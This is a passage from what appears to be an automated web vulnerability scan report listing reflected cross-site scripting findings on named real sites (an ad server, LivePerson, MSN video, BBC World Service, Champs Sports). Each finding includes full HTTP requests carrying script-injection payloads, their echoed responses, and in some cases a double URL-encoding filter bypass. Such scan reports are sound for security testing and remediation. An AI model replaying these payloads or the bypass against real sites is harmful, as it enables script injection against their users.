P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061102000000 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="155402";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057adb3c"-alert(1)-"9434c654dac";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/89704/184221/js/j-8970
...[SNIP]...

2.154. http://servedby.flashtalking.com/imp/14565 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f25c"-alert(1)-"be4ab3bf776 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=8f25c"-alert(1)-"be4ab3bf776&ftscw=&cachebuster=402290.103957057 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:27 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="155402";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=8f25c"-alert(1)-"be4ab3bf776&ftscw=&cachebuster=402290.103957057";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cdn.flashtalki
...[SNIP]...

2.155. http://servedby.flashtalking.com/imp/14565 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 934d9"-alert(1)-"34c51e25eb9 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=934d9"-alert(1)-"34c51e25eb9&cachebuster=402290.103957057 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:32 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 iad061106 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="135427";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=934d9"-alert(1)-"34c51e25eb9&cachebuster=402290.103957057";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/
...[SNIP]...

2.156. http://servedby.flashtalking.com/imp/14565 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fce0"-alert(1)-"4c220599aef was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=2fce0"-alert(1)-"4c220599aef&fty=&ftadz=&ftscw=&cachebuster=402290.103957057 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:18 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="155402";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=2fce0"-alert(1)-"4c220599aef&fty=&ftadz=&ftscw=&cachebuster=402290.103957057";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

2.157. http://servedby.flashtalking.com/imp/14565 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e708d"-alert(1)-"6f2d8ccd6e1 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=e708d"-alert(1)-"6f2d8ccd6e1&ftadz=&ftscw=&cachebuster=402290.103957057 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:22 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 iad061105 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="155351";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=e708d"-alert(1)-"6f2d8ccd6e1&ftadz=&ftscw=&cachebuster=402290.103957057";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cdn.fla
...[SNIP]...

2.158. http://servedby.flashtalking.com/imp/14565 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caef3"-alert(1)-"6f562582133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057&caef3"-alert(1)-"6f562582133=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:42 GMT
Server: Jetty(6.1.22)
Content-Length: 574
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="137521";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057&caef3"-alert(1)-"6f562582133=1";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/89704/184253/js/j-89
...[SNIP]...

2.159. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f5503%0a8a1cfed8918 was submitted in the site parameter. This input was echoed as f5503
8a1cfed8918
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=72961245f5503%0a8a1cfed8918&d_id=sales HTTP/1.1
Host: sr2.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 2141
Cache-Control: public, max-age=3600
Date: Thu, 04 Aug 2011 02:30:16 GMT
Connection: close

//Plugins for site 72961245f5503
8a1cfed8918

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.160. http://v5.ux-pt-br.opt.video.msn.com/OptimizeVc.aspx [callbackName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://v5.ux-pt-br.opt.video.msn.com
Path:   /OptimizeVc.aspx

Issue detail

The value of the callbackName request parameter is copied into the HTML document as plain text between tags. The payload fd9b0<script>alert(1)</script>2d73c8cea1 was submitted in the callbackName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /OptimizeVc.aspx?csid=ux-pt-br&p=v5&gc=1&ver=2&ck=v5Gal&vid=89d1bf2d-eed5-4f77-9150-bc441ddee528&callbackName=jsonp1312311566333fd9b0<script>alert(1)</script>2d73c8cea1&pl=http%3A%2F%2Fvideo.br.msn.com%2Fwatch%2Fvideo%2Fassassinato-na-argentina%2Fkprk9y9e%3Fcpkey%3D89d1bf2d-eed5-4f77-9150-bc441ddee528%257C%257C%257C%257C&rl=http%3A%2F%2Fvideo.br.msn.com%2Fwatch%2Fvideo%2Fmotores-roncam-por-vitimas-da-noruega%2Fkpz4ptha&responseEncoding=json HTTP/1.1
Host: v5.ux-pt-br.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://video.br.msn.com/watch/video/assassinato-na-argentina/kprk9y9e?cpkey=89d1bf2d-eed5-4f77-9150-bc441ddee528%7C%7C%7C%7C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; _HOP=I=1&TS=1312311307; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; MUID=9D76DAC5D4D147139C18D454161BD61E; lastVisit1=8/2/2011 6:58:26 PM; opd=; flt=68995; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; countrycode=US; zipcode=75207; sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: application/json; charset=utf-8
Expires: Tue, 02 Aug 2011 19:13:16 GMT
Last-Modified: Tue, 02 Aug 2011 19:03:16 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=8/2/2011 7:03:16 PM; expires=Tue, 02-Aug-2061 19:03:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 02 Aug 2011 19:03:15 GMT
Content-Length: 151

jsonp1312311566333fd9b0<script>alert(1)</script>2d73c8cea1({"tk":"&pl=nottop&lv=inf&ck=v5Gal&v=nottop&r=38&vid=89d1bf2d-eed5-4f77-9150-bc441ddee528"});

2.161. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wscdn.bbc.co.uk
Path:   /worldservice/js/site_catalyst/s_code_bbcws.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a24'-alert(1)-'4213cf6f59e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldservice/jsd1a24'-alert(1)-'4213cf6f59e/site_catalyst/s_code_bbcws.js?_=1312371710710 HTTP/1.1
Host: wscdn.bbc.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1

Response

HTTP/1.1 404 Not Found
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private, max-age=31535999
Date: Wed, 03 Aug 2011 11:42:11 GMT
Content-Length: 24278
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

...[SNIP]...
500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1',
       section: 'institutional',
       service: 'worldservice',
       siteVersion: '1024',
       storyId: '81151',
       documentType: 'story',
       uri: '/worldservice/jsd1a24'-alert(1)-'4213cf6f59e/site_catalyst/s_code_bbcws.js?_=1312371710710',
       isMobile: null
   }
</script>
...[SNIP]...

2.162. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wscdn.bbc.co.uk
Path:   /worldservice/js/site_catalyst/s_code_bbcws.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f09e'-alert(1)-'3f555978f4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldservice/js/site_catalyst6f09e'-alert(1)-'3f555978f4d/s_code_bbcws.js?_=1312371710710 HTTP/1.1
Host: wscdn.bbc.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1

Response

HTTP/1.1 404 Not Found
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private, max-age=31536000
Date: Wed, 03 Aug 2011 11:42:18 GMT
Content-Length: 24278
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

...[SNIP]...
ntro-de-barco-na-%c3%a1frica-do-sul-1',
       section: 'institutional',
       service: 'worldservice',
       siteVersion: '1024',
       storyId: '81151',
       documentType: 'story',
       uri: '/worldservice/js/site_catalyst6f09e'-alert(1)-'3f555978f4d/s_code_bbcws.js?_=1312371710710',
       isMobile: null
   }
</script>
...[SNIP]...

2.163. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wscdn.bbc.co.uk
Path:   /worldservice/js/site_catalyst/s_code_bbcws.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ad1'-alert(1)-'3c98025d146 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldservice/js/site_catalyst/s_code_bbcws.jse0ad1'-alert(1)-'3c98025d146?_=1312371710710 HTTP/1.1
Host: wscdn.bbc.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1

Response

HTTP/1.1 404 Not Found
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Expires: Wed, 03 Aug 2011 11:42:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 03 Aug 2011 11:42:25 GMT
Content-Length: 24278
Connection: close
Vary: Accept-Encoding
Set-Cookie: BBC-UID=347e8309f304b2a13c61d01581924402d7014862d0f0f2d192a8e044631c90880Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%206%2e1%3b%20en%2dUS%3b%20rv%3a1%2e9%2e2%2e13%29%20Gecko%2f20110504%20Namoroka%2f3%2e6%2e13; expires=Sun, 02-Aug-15 11:42:25 GMT; path=/; domain=bbc.co.uk;

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

...[SNIP]...
-%c3%a1frica-do-sul-1',
       section: 'institutional',
       service: 'worldservice',
       siteVersion: '1024',
       storyId: '81151',
       documentType: 'story',
       uri: '/worldservice/js/site_catalyst/s_code_bbcws.jse0ad1'-alert(1)-'3c98025d146?_=1312371710710',
       isMobile: null
   }
</script>
...[SNIP]...

2.164. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.champssports.com
Path:   /catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 55da3%252d%252d%253e1779cf3f641 was submitted in the REST URL parameter 4. This input was echoed as 55da3-->1779cf3f641 in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog/productdetail/model_nbr--151878/sku--0571248755da3%252d%252d%253e1779cf3f641&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1
Host: www.champssports.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 151671
Date: Tue, 02 Aug 2011 13:15:06 GMT
Connection: close
Set-Cookie: SSLC=web%2D45;domain=.champssports.com;path=/
Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:06 GMT;path=/
Set-Cookie: RECENTSKULIST=0571248755da3%2D%2D%3E1779cf3f641%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/
Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:06 GMT;path=/


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
<script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
<!-- web-45 -->
<script type="text/javas
...[SNIP]...
<!--0571248755da3-->1779cf3f641-->
...[SNIP]...

2.165. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.champssports.com
Path:   /catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dca%2527%253balert%25281%2529%252f%252fed42f472d7a was submitted in the REST URL parameter 4. This input was echoed as 63dca';alert(1)//ed42f472d7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog/productdetail/model_nbr--151878/sku--0571248763dca%2527%253balert%25281%2529%252f%252fed42f472d7a&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1
Host: www.champssports.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
